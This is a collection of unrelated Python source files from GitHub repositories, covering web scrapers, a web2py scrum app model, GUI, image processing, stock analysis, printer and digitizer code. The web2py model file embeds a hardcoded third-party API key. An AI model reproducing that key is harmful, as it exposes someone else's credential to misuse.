response.xpath(\"//div[@class='entry-content']/descendant-or-self::*/text()\").getall()\n        content = [text for text in content if text.strip()]\n        content = \" \".join(content)\n\n        if date != \"Not available\":\n            date_time_obj = datetime.strptime(date, '%d.%m.%Y')\n            date = date_time_obj.strftime(\"%Y/%m/%d\")\n\n        item.add_value('title', title)\n        item.add_value('author', author)\n        item.add_value('date', date)\n        item.add_value('category', category)\n        item.add_value('link', response.url)\n        item.add_value('content', content)\n\n        return 
item.load_item()\n","repo_name":"daniel-kanchev/elenkov","sub_path":"elenkov/spiders/elen.py","file_name":"elen.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9469791020","text":"from gluon.tools import Auth, Service, PluginManager,prettydate\nimport os\n\ndb = DAL(\"sqlite://storage.sqlite\")\nresponse.generic_patterns = ['*'] if request.is_local else []\nauth = Auth(db, hmac_key=Auth.get_or_create_key())\nservice = Service()\nplugins = PluginManager()\n\n## create all tables needed by auth if not custom tables\nauth.define_tables(username=False, signature=False)\nauth.settings.extra_fields['auth_user']= [Field('Pic','upload'),Field('About_Me','text')]\n\n\n## configure auth policy\nauth.settings.registration_requires_verification = False\nauth.settings.registration_requires_approval = False\nauth.settings.reset_password_requires_verification = True\n\n# modify default policy on creating unique groups for each user\nauth.settings.create_user_groups = None\n\n\n\nif auth.user_id != None:\n setGroup=auth.user_groups.copy()\nelif auth.user_id is None:\n setGroup=[\"None\",\"You Need to Log In\"]\n \nfrom gluon.contrib.login_methods.rpx_account import RPXAccount\nauth.settings.actions_disabled=['register', 'change_password','request_reset_password']\nauth.settings.login_form = RPXAccount(request,\n api_key='73dab71b7fdfc0f49c10f8e64ee6a5adcf66b2c3',\n domain='ScrumLite',\n url = \"http://scrumlite.rpxnow.com/%s/default/user/login\" % request.application)\n\ndb.define_table('images',\n Field('image', 'upload', uploadfolder=os.path.join(request.folder,'uploads')),\n Field('user',db.auth_user))\n\ndb.images.user.writable = db.images.user.readable = False\n\ndb.define_table('Team',\n Field('product_owner', 'reference auth_user', default=auth.user_id, writable = False),\n Field('product_name', requires = IS_NOT_EMPTY()),\n Field('team_name', requires = IS_NOT_EMPTY()),\n Field('team_leader', 'reference auth_user'),\n Field('team_group', 'reference auth_group'),\n Field('product_description', 'text', requires = IS_NOT_EMPTY()),\n format = '%(team_name)s')\n\ndb.Team.id.readable = False\n\ndb.define_table('Sprint',\n Field('sprint_name'),\n Field('start_date', 'date'),\n Field('end_date', 'date'),\n Field('team_id', 'reference Team')\n)\n\ndb.define_table('Story',\n Field('backlogged', type = 'boolean', default = 'True'),\n Field('sprint_id', 'reference Sprint', default=None),\n Field('team_id', 'reference Team'),\n Field('user_story','text', requires = IS_NOT_EMPTY()),\n Field('story_points','integer', default=0),\n Field('completed', type = 'boolean', default = 'False', readable=False),\n Field('created_on', 'datetime', default=request.now, writable = False),\n Field('created_by', 'reference auth_user', default=auth.user_id),\n )\n\ndb.Story.sprint_id.readable = False\ndb.Story.completed.readable = False\ndb.Story.created_by.writable = False\n\ndb.define_table('Task',\n Field('name', requires = IS_NOT_EMPTY()),\n Field('description', 'text', requires = IS_NOT_EMPTY()),\n Field('status','string', requires=IS_IN_SET([\"To do\", \"In progress\", \"Done\"]), default=\"To do\"),\n Field('assigned', 'reference auth_user', default=None),\n Field('task_creation_time', 'datetime', default=request.now, writable = False),\n Field('estimated_completion_time', 'datetime', requires = IS_DATETIME()),\n Field('task_points', 'integer', requires=IS_IN_SET(['0','1','2','3','5','8','13','21'])),\n 
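# link each Task to its parent Story; the field is set in code and hidden from forms (see the writable/readable flags below)\n                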
Field('story_id', 'reference Story')\n )\n\ndb.define_table('Comments',\n Field('task_id', 'reference Task'),\n Field('date', 'datetime', default=request.now),\n Field('from_user', 'reference auth_user', default=auth.user_id),\n Field('comment', 'string', requires=IS_NOT_EMPTY())\n )\n\nif auth.user_groups.keys():\n query = ((db.auth_group.id==auth.user_groups.keys()[0]) & (db.auth_group.id==db.auth_membership.group_id) & (db.auth_membership.user_id==db.auth_user.id))\n db.Task.assigned.requires=IS_EMPTY_OR(IS_IN_DB(db(query), db.auth_user, '%(first_name)s'))\ndb.Task.story_id.writable = db.Task.story_id.readable = False\n\ndb.define_table('Invitations',\n Field('to_user', 'reference auth_user'),\n Field('from_user', 'reference auth_user', default=auth.user_id),\n Field('from_group', 'reference auth_group'))\n\n#db.define_table('TSR',Field('Team','integer', writable=False),Field('Time_Period'),Field('Weekly_Summarization', 'text', requires = IS_NOT_EMPTY()))\n\nPost= db.define_table(\"post\",\n Field(\"message\", \"text\", requires=IS_NOT_EMPTY(), notnull=True),\n auth.signature)\nPost.is_active.readable = False\nPost.is_active.writable = False\n","repo_name":"coltonUCSC/cs183","sub_path":"models/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":4390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39804555326","text":"import tkinter as tk\nfrom homepage import *\nfrom searchpage import *\nfrom calcpage import *\n\nclass MainView(tk.Frame):\n def __init__(self, *args, **kwargs):\n tk.Frame.__init__(self, *args, **kwargs)\n\n home = HomePage(self)\n search = SearchPage(self)\n calc = CalcPage(self)\n\n buttonFrame = tk.Frame(self, height=600, width=50, highlightbackground=\"black\", highlightthickness=1, bg=\"sky blue\")\n container = tk.Frame(self, height=600, width=750)\n buttonFrame.pack(side=\"left\", fill=\"y\", expand=False)\n container.pack(side=\"right\", fill=\"both\", expand=True)\n\n home.place(in_=container, x=0, y=0, relwidth=1, relheight=1)\n search.place(in_=container, x=0, y=0, relwidth=1, relheight=1)\n calc.place(in_=container, x=0, y=0, relwidth=1, relheight=1)\n\n b1 = tk.Button(buttonFrame, width=8, height=5, text=\"Home\", bg=\"medium aquamarine\", command=home.show)\n b2 = tk.Button(buttonFrame, width=8, height=5, text=\"Search\", bg=\"deep sky blue\", command=search.show)\n b3 = tk.Button(buttonFrame, width=8, height=5, text=\"Calculator\", bg=\"royal blue\", command=calc.show)\n \n b1.pack(side=\"top\")\n b2.pack(side=\"top\")\n b3.pack(side=\"top\")\n \n home.update()\n\n home.show() \n\nif __name__ == \"__main__\":\n master = tk.Tk()\n\n main = MainView(master)\n main.pack(side=\"top\", fill=\"both\", expand=\"True\")\n master.wm_geometry(\"600x450\")\n master.resizable(0, 0) \n master.mainloop()\n","repo_name":"Yacine-Saoudi/hackathonRepo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40420285562","text":"import xml.etree.ElementTree as ET\nimport xml\nimport pandas as pd\nimport pickle as pic\nfrom mmseqs_hmmtop import overlapDict\nimport json\n\n\nquery_data = {}\ntarget_data = {}\n\ndef get_tms_info(protein, genome):\n # if we are looking for tms info of a genome protein\n if genome == True:\n return query_data[protein]\n else:\n return target_data[protein]\n\n\ndef parse(hmmtop_file, xml_dir, results_file, minRes):\n with open(hmmtop_file, 
\"rb\") as file:\n # Deserialize the data using pickle.load()\n data = pic.load(file)\n \n # Extracts all query data and target data from hmmtop file\n query_data = data['queries']\n \n with open('genome_tms.txt', 'w') as f:\n json.dump(data, f, indent=4)\n\n for key in data['tcdb']:\n key_elems = key.split('|')\n new_key = key_elems[3] + '-' + key_elems[2].split('.')[0]\n \n target_data[new_key] = data['tcdb'][key]\n\n\n \n xml_format = xml_dir\n tsv_file = results_file\n df = pd.read_table(tsv_file)\n file_to_find = df['#Query_id']\n\n dictionary = {}\n\n\n sequences = {}\n mmseqsDict = {}\n hmmTopDict = {}\n # for each id in the dataframe results.tsv\n for row in df.itertuples(index=False):\n key = row._0\n hmm_key = row._0\n xmlfile = xml_format + key + '.xml'\n tree = ET.parse(xmlfile)\n root = tree.getroot()\n\n\n # ['gnl', 'TC-DB', 'P60778', '2.A.1.7.14 Protein tsgA OS=Escherichia coli (strain K12) GN=tsgA PE=1 SV=1']\n # goes through each branch of the xml file that contains 'hit'\n for item in root.findall('./BlastOutput_iterations/Iteration/Iteration_hits/Hit'):\n hit_info = item.find('Hit_def').text.split('|')\n # looks for the specific target accession that correlates to the results.tsv data trunkating the .1 at end of hit_xid\n if hit_info[2].split('.')[0] == row.Hit_xid and hit_info[3].split(' ')[0] == row.Hit_tcid: # fails here\n j = item.findall('Hit_hsps/Hsp')\n # if it exists, then look to see if there is alignment sequences in xml\n for h_item in j:\n query_seq = h_item.find('Hsp_qseq').text\n subject_seq = h_item.find('Hsp_hseq').text\n target_id = row.Hit_tcid + '-' + row.Hit_xid\n\n # only include in mmseqs if the target accession and query exists in results.tsv\n if key in query_data and target_id in target_data: # issue here not in target_data\n if key not in mmseqsDict:\n mmseqsDict[key] = {'qaln': query_seq, 'taln': subject_seq, 'target': target_id,\n 'qstart': row.Q_start, 'qend': row.Q_end, 'tstart': row.S_start, 'tend': row.S_end}\n # puts the overlaps in the format needed by overlapDict\n qtms = {}\n if key in query_data:\n qtms['tms'] = list(query_data[key].values())\n if key not in hmmTopDict:\n hmmTopDict[key] = qtms\n\n\n ttms = {}\n if target_id in target_data:\n ttms['tms'] = list(target_data[target_id].values())\n if target_id not in hmmTopDict:\n hmmTopDict[target_id] = ttms\n #print(target_data)\n # there are some keys in df that are not in query or target data what to do about those?\n overlap_dict = overlapDict(mmseqsDict, hmmTopDict, minRes)\n return overlap_dict\n\ndef main():\n hmmtop_file, xml_dir, results_file, minRes = \"gblast_test/hmmtop.db\", \"gblast_test/xml/\", 'gblast_test/results.tsv', 8\n parse(hmmtop_file, xml_dir, results_file, minRes)\n\n'''\n#For Testing\ntempMmseqs = {}\ntempData = {}\ntempData['qaln'] = 'MGFDIGGDIGKPLKDAFDKFGADIKMTFLTVLNWMK--WISIG------ILIVISVI-------LICKIIKVLFQCGKCLLSCFGFCKK'\ntempData['taln'] = 'MGFSINFD---PIINKFREFQTNINHNINEQLDKLKMVWINLGSHIKYWFIIIISILTILFILFLLIKITKLILNCKKIFSCCCNVCCK'\ntempData['target'] = '1.A.100.1.1-B2X7D9'\ntempData['qstart'] = 1\ntempData['qend'] = 74\ntempData['tstart'] = 22\ntempData['tend'] = 107\ntempMmseqs['1.A.95.2.5-YP_009361958'] = tempData\n\ntempHmmtop = {}\ntempQhmmData = {}\ntempQhmmData['tms'] = [[26, 49], [54,72]]\ntempThmmData = {}\ntempThmmData['tms'] = [[68, 92]]\ntempHmmtop['1.A.95.2.5-YP_009361958'] = tempQhmmData\ntempHmmtop['1.A.100.1.1-B2X7D9'] = tempThmmData\noverlap_dict = overlapDict(tempMmseqs, tempHmmtop, 
minRes)\n'''\n","repo_name":"gauthamp123/microbiome_project","sub_path":"parseXML.py","file_name":"parseXML.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29489707142","text":"from turtle import Turtle\r\n\r\n\r\nclass ScoreBoard(Turtle):\r\n def __init__(self):\r\n super().__init__()\r\n self.scores = 0\r\n with open(\"data\") as high_score_data:\r\n self.high_score = int(high_score_data.read())\r\n self.color(\"white\")\r\n self.hideturtle()\r\n self.penup()\r\n self.goto(0, 180)\r\n\r\n def score_board(self):\r\n self.write(f\"SCORE: {self.scores} High Score: {self.high_score}\", align=\"center\",\r\n font=(\"Courier\", 10, \"normal\"))\r\n\r\n def score_update(self):\r\n self.clear()\r\n self.scores += 1\r\n self.write(f\"SCORE: {self.scores} High Score: {self.high_score}\", align=\"center\",\r\n font=(\"Courier\", 10, \"normal\"))\r\n\r\n def h(self):\r\n self.clear()\r\n self.write(f\"SCORE: {self.scores} High Score: {self.high_score}\", align=\"center\",\r\n font=(\"Courier\", 10, \"normal\"))\r\n\r\n def reset(self):\r\n if self.scores > self.high_score:\r\n self.high_score = self.scores\r\n with open(\"data\", mode=\"w\") as high_score_data:\r\n high_score_data.write(f\"{self.high_score}\")\r\n self.scores = 0\r\n self.h()\r\n\r\n #def game_over(self):\r\n #self.goto(0, 0)\r\n #self.write(\"GAME OVER\", align=\"center\", font=(\"Courier\", 20, \"normal\"))\r\n\r\n\r\n\r\n","repo_name":"Nabayan1/nobster","sub_path":"score_board.py","file_name":"score_board.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19176556552","text":"import unittest\nimport math\nfrom subgradpy import *\n\nclass testNorm2(unittest.TestCase):\n def setUp(self):\n pass\n \n def test_get_value(self):\n x = var('x');\n y = var('y');\n z = var('z');\n var_map={'x':12.2,'y':-3.4,'z':0.0}\n ex = norm2(x,y,z)\n self.assertAlmostEqual(ex.get_value(var_map),\n math.sqrt(sum([elem*elem for elem in var_map.values()])))\n \n def test_subgrad(self):\n x = var('x');\n y = var('y');\n z = var('z');\n var_map={'x':12.2,'y':-3.4,'z':0}\n ex = norm2(x,y,z)\n g = ex.subgrad(var_map)\n self.assertAlmostEqual(g['x'],12.2/(math.sqrt(12.2**2.0+3.4**2.0)))\n self.assertAlmostEqual(g['y'],-3.4/(math.sqrt(12.2**2.0+3.4**2.0)))\n self.assertAlmostEqual(g['z'],0)\n\n \n\nif __name__=='__main__':\n unittest.main()\n","repo_name":"cvxgrp/subgradpy","sub_path":"unit_tests/norm2_test.py","file_name":"norm2_test.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"21349439019","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 27 14:03:15 2021\n\n@author: james\n\"\"\"\n\nimport retrieve_stock_data as rsd\nimport numpy as np\n\ndef get_biggest_changes(dfs, days = -1):\n \"\"\"\n Get the stocks that have changed the most in the given timeframe\n based on the average over the given period. 
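The change is measured\n    as the percent difference between the latest close and the mean close over that period.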
\n    Note: we're assuming each row of the dataframe represents one day.\n    \"\"\"\n    percent_changes = get_percentage_changes(dfs, days)\n    most_increased, most_decreased = determine_biggest_changes(percent_changes)\n    return most_increased, most_decreased\n\n\ndef get_percentage_changes(dfs, days):\n    \"\"\"\n    Calculate the amount all stocks have changed over the given period\n    \"\"\"\n    changes = {}\n    for company in dfs:\n        df = dfs[company]\n        close_prices = df['Adj Close']\n        if len(close_prices) == 0:\n            continue\n\n        if days != -1:\n            length = len(close_prices)\n            close_prices = close_prices[(length - days)::]\n\n        try:\n            mean = close_prices.mean()\n            cur = close_prices.iloc[-1] # positional indexing; plain [] would do a label lookup after slicing\n            per = (cur - mean)/mean * 100\n            changes[company] = per\n        except Exception as e:\n            print(f\"Error getting {company}: {e}\")\n\n    return changes\n\ndef determine_biggest_changes(changes):\n    \"\"\"\n    Retrieve a list of the companies that have changed the most based on\n    the calculated percentage change. Returns separate lists of those that\n    have increased the most and those that have decreased\n    \"\"\"\n    list_companies = [company for company in changes]\n    list_changes = [changes[change] for change in changes]\n    arr_changes = np.array(list_changes)\n    indexes = np.argsort(arr_changes)\n\n    decreases = [list_companies[i] for i in indexes[0:20]]\n    increases = [list_companies[i] for i in indexes[::-1][0:20]]\n    return increases, decreases\n\n\ndfs, stocks = rsd.get_all_data_frames()\n\nmost_increased, most_decreased = get_biggest_changes(dfs, 6*30)\n\n","repo_name":"JamesLaw86/finance_tools","sub_path":"analyse_stock_data.py","file_name":"analyse_stock_data.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"405187874","text":"import os\nimport errno\nimport json\n\n\ndef validate_or_make_directory(directory_string):\n    \"\"\"\n    Check if a directory exists. If it doesn't, then create it.\n\n    :param directory_string: The relative directory string (ex: database/secrets.json)\n    :type directory_string: str\n    \"\"\"\n    if not os.path.exists(os.path.dirname(directory_string)):\n        try:\n            os.makedirs(os.path.dirname(directory_string))\n            print(\"Successfully created `{}` file directory\".format(directory_string))\n        except OSError as exception:  # Guard against race condition\n            if exception.errno != errno.EEXIST:\n                raise\n\n\ndef get_json_from_file(directory_string, default_json_content=None):\n    \"\"\"\n    Get the contents of a JSON file. If it doesn't exist,\n    create and populate it with specified or default JSON content.\n\n    :param directory_string: The relative directory string (ex: database/secrets.json)\n    :type directory_string: str\n    :param default_json_content: The content to populate a non-existing JSON file with\n    :type default_json_content: dict, list\n    \"\"\"\n    validate_or_make_directory(directory_string)\n    try:\n        with open(directory_string) as file:\n            file_content = json.load(file)\n            return file_content\n    except (IOError, json.decoder.JSONDecodeError):\n        with open(directory_string, \"w\") as file:\n            if default_json_content is None:\n                default_json_content = {}\n            json.dump(default_json_content, file, indent=4)\n            return default_json_content\n\n\ndef write_json_to_file(directory_string, json_content):\n    \"\"\"\n    Write the given JSON content to a file, 
overwriting any existing contents.\n\n    :param directory_string: The relative directory string (ex: database/secrets.json)\n    :type directory_string: str\n    :param json_content: The JSON-serializable content to write to the file\n    :type json_content: dict\n    \"\"\"\n    with open(directory_string, \"w\") as file:\n        json.dump(json_content, file, indent=4)\n","repo_name":"JPStrydom/Crypto-Trading-Bot","sub_path":"src/directory_utilities.py","file_name":"directory_utilities.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":300,"dataset":"github-code","pt":"48"} +{"seq_id":"28127294911","text":"# -*- coding: utf-8 -*-\r\n\r\nimport socket\r\nfrom escpos import printer, escpos\r\nimport threading\r\nimport time\r\nimport logging\r\nfrom DriverInterface import DriverInterface\r\n\r\n\r\n# TCP_PORT = 9100\r\n\r\n\r\nclass ReceiptDirectJetDriver(printer.Network, DriverInterface):\r\n    connected = False\r\n\r\n    def __init__(self, host, port=9100, timeout=10, codepage=\"cp858\", mac=\"\", vendor=\"\", cols=42, *args, **kwargs):\r\n        \"\"\" written out here just to make the initial variables explicit \"\"\"\r\n        \"\"\"\r\n        :param host : Printer's hostname or IP address\r\n        :param port : Port to write to\r\n        :param timeout : timeout in seconds for the socket-library\r\n        :param codepage : codepage default to cp858\r\n        \"\"\"\r\n        escpos.Escpos.__init__(self, *args, **kwargs)\r\n        self.host = host\r\n        self.port = int(port)\r\n        self.timeout = timeout\r\n        self.codepage = codepage\r\n        self.cols = int(cols)\r\n\r\n    def start(self):\r\n        \"\"\" start the connection \"\"\"\r\n        try:\r\n            self.open()\r\n            self.connected = True\r\n        except Exception as e:\r\n            logging.error(\"Printer error: \"+str(e))\r\n        return True\r\n\r\n\r\n    def end(self):\r\n        try:\r\n            self.close()\r\n            self.connected = False\r\n        except Exception as e:\r\n            logging.error(\"Printer error: \"+str(e))\r\n\r\n    def reconnect(self):\r\n        try:\r\n            self.open()\r\n            self.connected = True\r\n        except Exception as e:\r\n            self.connected = False\r\n","repo_name":"paxapos/fiscalberry","sub_path":"Drivers/ReceiptDirectJetDriver.py","file_name":"ReceiptDirectJetDriver.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"48"} +{"seq_id":"71882724627","text":"\"\"\"\nFind the least common multiple of the elements in the input list\n\"\"\"\n\n\ndef least(a, b):\n    i = 1\n    while True:\n        if a * i % b == 0:\n            return a * i\n        else:\n            i += 1\n\n\ndef solution(arr):\n    temp = arr[0]\n    for value in arr:\n        temp = least(temp, value)\n    return temp\n\n\narr = [2, 6, 8, 14]\nprint(solution(arr))\n\n\n","repo_name":"Donkey-1028/algorithms","sub_path":"alghorithms-of-everyone/least-common-multiple.py","file_name":"least-common-multiple.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9902160165","text":"from random import randint\nfrom unicodedata import decimal\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport os\nfrom scisdk.scisdk import SciSDK\nfrom scisdk.scisdk_defines import *\n\nfig = plt.figure(\"Digitizer analog data - channel 0\")\nax1 = fig.add_subplot(1,1,1)\n\n# initialize scisdk library\nsdk = SciSDK()\n\n#DT1260\nres = sdk.AddNewDevice(\"usb:10500\",\"dt1260\", \"./DT1260RegisterFile.json\",\"board0\")\n#DT5560\n#res = 
sdk.AddNewDevice(\"192.168.50.10:8888\",\"DT5560\", \"./DT5560RegisterFile.json\",\"board0\")\n#DT5550\n#res = sdk.AddNewDevice(\"usb:11000\",\"DT5550\", \"./DT5550RegisterFile.json\",\"board0\")\n#V2740\n#res = sdk.AddNewDevice(\"192.168.50.10\",\"V2740\", \"./V2740RegisterFile.json\",\"board0\")\n\nif res != 0:\n print (\"Script exit due to connetion error\")\n exit()\n\nenabled_channels = 1\n# set oscilloscope parameters\nres = sdk.SetParameterString(\"board0:/MMCComponents/Digitizer_0.data_processing\",\"decode\")\nres = sdk.SetParameterInteger(\"board0:/MMCComponents/Digitizer_0.enabledch\", enabled_channels)\nres = sdk.SetParameterInteger(\"board0:/MMCComponents/Digitizer_0.acq_len\", 8000)\nres = sdk.SetParameterString(\"board0:/MMCComponents/Digitizer_0.acq_mode\", \"blocking\")\nres = sdk.SetParameterInteger(\"board0:/MMCComponents/Digitizer_0.timeout\", 2000)\nres = sdk.ExecuteCommand(\"board0:/MMCComponents/Digitizer_0.start\", \"\")\n# allocate buffer for oscilloscope\nres, buf = sdk.AllocateBuffer(\"board0:/MMCComponents/Digitizer_0\")\n\ndef updateGraph(i, buffer): # function that provides to plot new data on graph\n res, buffer = sdk.ReadData(\"board0:/MMCComponents/Digitizer_0\", buffer)# read data from board\n if res == 0:\n xar = []\n yar = []\n for index in range(buffer.info.valid_samples):\n xar.append(index)\n yar.append(buffer.analog[index])\n ax1.clear()\n ax1.plot(xar,yar)\n\n# update graph every 50ms\nani = animation.FuncAnimation(fig, updateGraph, fargs=[buf],interval=200)\n# updateGraph(None, buf, decimator)\nplt.show()","repo_name":"NuclearInstruments/SCISDK","sub_path":"examples/components/Python/Digitizer/digitizer.py","file_name":"digitizer.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"454065026","text":"#access to properties of image and videos\n\nimport cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg =cv.imread('test.png')\npx = img[100,100] # the specific pixel of img [100, 100]\nprint(px) #print out properties\n\nblue = img[100,100,0] # show the properties of blue =0 green=1 red=2 as BRG\nprint(blue)\n\nimg[100, 100] = [255, 255, 255] # change color of pixel [100,100]\nprint(px)\n\ncolory = cv.imread('test.jpg', cv.IMREAD_COLOR)\nalpha_img = cv.imread('test.jpg', cv.IMREAD_UNCHANGED)\ngray_img = cv.imread('test.jpg', cv.IMREAD_GRAYSCALE)\n\n#shape of img\nprint('RGB shape : ', colory.shape)\nprint('Alpha shape : ', alpha_img.shape)\nprint('gray shape : ', gray_img.shape)\n#img type\nprint('image datatype : ', colory.dtype)\n\n#img size\nprint('image Size : ', colory.size)\n\n# cropping selected ROI from img\nroi = cv.selectROI(img)\nprint(roi)\nroi_cropped = img[int(roi[1]):int(roi[1]+roi[3]), int(roi[0]):int(roi[0]+roi[2])] #get cropped position\ncv.imshow(\"ROI Image\", roi_cropped) #show cropped img\ncv.imwrite(\"cropped.jpg\", roi_cropped) #save cropped to file\n\n\n#split image to three channel\ng,b,r = cv.split(img)\n\ncv.imshow(\"green\", g)\ncv.imshow(\"blue\" , b)\ncv.imshow(\"red\" , r)\n\nimag = cv.merge((g,b,r)) #merge two channel to one\ncv.imshow(\"merge\",imag)\n\n\n# change color of image\nlab = cv.cvtColor(img, cv.COLOR_RGB2LAB)\ncv.imshow(\"lab view\", lab)\n\n\n# blending two image\nsrc1 = cv.imread('test.png', cv.IMREAD_COLOR)\nsrc2 = cv.imread('index.jpg', cv.IMREAD_COLOR)\nimg1 = cv.resize(src1, (800,600)) #resize image\nimg2 = cv.resize(src2, (800,600))\nblended_img = 
cv.addWeighted(img1,0.5,img2,1,0.0) # blend the two images together\ncv.imshow(\"blended image\", blended_img)\n\n# Apply filters\nk_sharpen = np.array([[-1,-1,-1],\n                      [-1,9 ,-1],\n                      [-1,-1,-1]])\nk_edge = np.array([[1,1,1],\n                   [1,-9 ,1],\n                   [1,1,1]])\n# apply filters\nedge_img = cv.filter2D(img,-1,k_edge)\nsharpen = cv.filter2D(img,-1,k_sharpen)\ncv.imshow(\"edges\", edge_img)\ncv.imshow(\"filtered\", sharpen)\n\n\n# some other filters\ngray = cv.imread(\"index.jpg\", cv.IMREAD_GRAYSCALE)\nret, thresh = cv.threshold(gray,127, 255, cv.THRESH_BINARY)\ncanny_img = cv.Canny(gray,50,100)\ncv.imshow(\"original\", gray)\ncv.imshow(\"threshold\", thresh)\ncv.imshow(\"canny\", canny_img)\n\n\n# contour and shape detection\nshape = cv.imread('shapes.png')\ngray = cv.cvtColor(shape, cv.COLOR_BGR2GRAY)\n\n# Setting threshold of the gray image\n_, threshold = cv.threshold(gray,127,255, cv.THRESH_BINARY)\n\n# find contours using the findContours function\ncontours,_= cv.findContours(threshold, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n\ni=0\nfor contour in contours:\n    if i==0: # skip the first contour (the outer border of the image)\n        i=1\n        continue\n    approx = cv.approxPolyDP(contour,0.01*cv.arcLength(contour,True), True)\n    cv.drawContours(shape, [contour], 0, (255,0,255), 5)\n\n    # finding the center of the different shapes\n    M = cv.moments(contour)\n    if M['m00'] != 0.0:\n        x= int(M['m10']/M['m00'])\n        y= int(M['m01']/M['m00'])\n\n    # put the name of each shape at its center\n    if len(approx) ==3:\n        cv.putText(shape,'Triangle', (x, y), cv.FONT_HERSHEY_SIMPLEX, 0.6, (0,255,255), 2)\n    elif len(approx) ==4:\n        cv.putText(shape, 'Quadrilateral', (x, y), cv.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 255), 2)\n    elif len(approx) ==5:\n        cv.putText(shape, 'Pentagon', (x, y), cv.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 255), 2)\n    elif len(approx) ==6:\n        cv.putText(shape, 'Hexagon', (x, y), cv.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 255), 2)\n    elif len(approx) ==7:\n        cv.putText(shape, '7-Gon', (x, y), cv.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 255), 2)\n    else:\n        cv.putText(shape, 'Circle', (x, y), cv.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 255), 2)\n\ncv.imshow('shapes', shape)\n\n# Color detection\nhsv = cv.cvtColor(img,cv.COLOR_BGR2HSV)\n# range of blue color to show\nlower_blue = np.array([0,50,50])\nupper_blue = np.array([140,255,255])\n# threshold the hsv image to get only blue colors\nmake_blue = cv.inRange(hsv, lower_blue,upper_blue)\nres = cv.bitwise_and(img,img,mask=make_blue) # put mask on image\ncv.imshow('res', res)\n\n\n# place an object\nimg1 = shape.copy()\nmask=np.zeros((100,200,3))\nprint(mask.shape)\npos = (200,200)\nimg1[200:(200+mask.shape[0]), 200:(200+mask.shape[1])] = mask\ncv.imshow(\"coloring\",img1)\n\n\ncv.waitKey(0)\ncv.destroyAllWindows()","repo_name":"ramin77786408/Opencv-Learning","sub_path":"next_episode_opencv.py","file_name":"next_episode_opencv.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5396888923","text":"def LaSoNguyenTo(x): # \"is x a prime number?\"\n    if x<2:\n        return False\n    for i in range(2,x+1,1):\n        if x%i==0:\n            break\n    if x==i:\n        return True\ndef SoHopLe(x): # an input of x <= 1 ends the sequence\n    return x<=1\ndef NhapVaDem(): # read numbers and count the primes\n    j=1\n    kq=0\n    while j>0:\n        x=int(input())\n        if LaSoNguyenTo(x):kq+=1\n        if SoHopLe(x):break\n    return kq\ndef InKQ(kq): # print the result\n    print('There are',kq,'prime numbers')\nprint('Enter the numbers:')\nkq=NhapVaDem()\nInKQ(kq)","repo_name":"phamhung116/CoSoLapTrinh","sub_path":"Chuong4/BaiTap/4-5.py","file_name":"4-5.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
+{"seq_id":"21445442364","text":"import base64\nimport glob\nimport requests\nfrom PyPDF2 import PdfFileWriter, PdfFileReader\n\norig_path = \"../dense-vector-elastic/pdfs/*.pdf\"\n\n# for fname in glob.glob(orig_path):\n# filename = fname.split('/')[2]\n# inputpdf = PdfFileReader(open(fname, \"rb\"))\n#\n# for i in range(inputpdf.numPages):\n# output = PdfFileWriter()\n# output.addPage(inputpdf.getPage(i))\n# with open(\"../pages-pdfs/{}-{}.pdf\".format(filename, i), \"wb\") as outputStream:\n# output.write(outputStream)\n\nid = 0\n\npages_path = \"../dense-vector-elastic/pages-pdfs/*.pdf\"\n\nfor fname in glob.glob(pages_path):\n print(fname)\n with open(fname, 'rb') as f:\n data = base64.b64encode(f.read()).decode('ascii')\n r = requests.put('http://192.168.8.101:9200/pdfs/_doc/{}?pipeline=pdf-indexing'.format(id),\n json = {\n \"data\": data\n })\n id += 1\n\n","repo_name":"MysterionRise/boost-search","sub_path":"dense-vector-elastic/encode_pdfs.py","file_name":"encode_pdfs.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"2789504200","text":"import scrapy\nimport re\n\nclass SchoolSpider(scrapy.Spider):\n name = 'school'\n allowed_domains = ['isd110.org']\n start_urls = ['https://isd110.org/our-schools/laketown-elementary/staff-directory']\n custom_settings = {\n 'FEED_FORMAT': 'csv',\n 'FEED_URI': 'isd_data.csv'\n 